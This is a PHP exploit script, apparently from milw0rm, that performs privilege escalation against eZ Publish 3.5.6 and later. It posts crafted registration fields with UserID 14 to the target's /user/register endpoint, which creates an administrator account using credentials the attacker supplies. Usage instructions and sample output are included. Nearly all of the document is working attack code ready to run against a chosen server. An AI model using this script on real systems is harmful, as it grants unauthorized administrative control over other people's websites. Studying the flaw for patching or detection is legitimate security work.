<?php

/*
	eZ Publish privilege escalation exploit by s4avrd0w [s4avrd0w@p0c.ru]
	Versions affected >= 3.5.6
	Resolved in 3.9.5, 3.10.1, 4.0.1
	More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible

	* tested on version 3.9.0

	usage: 

	# ./eZPublish_privilege_escalation_exploit.php -u=username -p=password -e=email -s=EZPublish_server

	The options are required:

	-u Login of the new admin on eZ Publish
	-p Password of the new admin on eZ Publish
	-e Email where to go the letter for activation new admin account
	-s Target for privilege escalation

	example:

	# ./eZPublish_privilege_escalation_exploit.php -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
	[+] Exploit successfully sending
	[+] Activate your new account and be registered in system using toor/P@ssw0rd
*/

function help_argc($script_name)
{
print "
usage:

# ./".$script_name." -u=username -p=password -e=email -s=EZPublish_server

The options are required:
 -u Login of the new admin on eZ Publish
 -p Password of the new admin on eZ Publish
 -e Email where to go the letter for activation new admin account
 -s Target for privilege escalation

example:

# ./".$script_name." -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
[+] Exploit successfully sending
[+] Activate your new account and be registered in system using toor/P@ssw0rd

";
}

function successfully($login,$password)
{
print "
[+] Exploit successfully sending
[+] Activate your new account and be registered in system using $login/$password
";
}

if ($argc != 5 || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
	help_argc($argv[0]);
	exit(0);
}
else
{
	$ARG = array(); 
	foreach ($argv as $arg) { 
		if (strpos($arg, '-') === 0) { 
			$key = substr($arg,1,1);
			if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); 
		} 
	}

	if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s])
	{

		$post_fields = array(
			'ContentObjectAttribute_data_user_login_30' => $ARG[u],
			'ContentObjectAttribute_data_user_password_30' => $ARG[p],
			'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],
			'ContentObjectAttribute_data_user_email_30' => $ARG[e],
			'UserID' => '14',
			'PublishButton' => '1'
		);

		$headers = array(
		    'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
		    'Referer' => $ARG[s]
		);

		$res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);
		$res_http->addPostFields($post_fields);
		$res_http->addHeaders($headers);
		try {
    			$response = $res_http->send()->getBody();

			if (eregi("success", $response))
			{
				successfully($ARG[u],$ARG[p]);
			}
			else
			{
				print "[-] Exploit failed";
			}

		} catch (HttpException $exception) {

			print "[-] Not connected";
			exit(0);

		}

	}
	else
	{
		help_argc($argv[0]);
		exit(0);
	} 
}

?>

# milw0rm.com [2008-12-10]
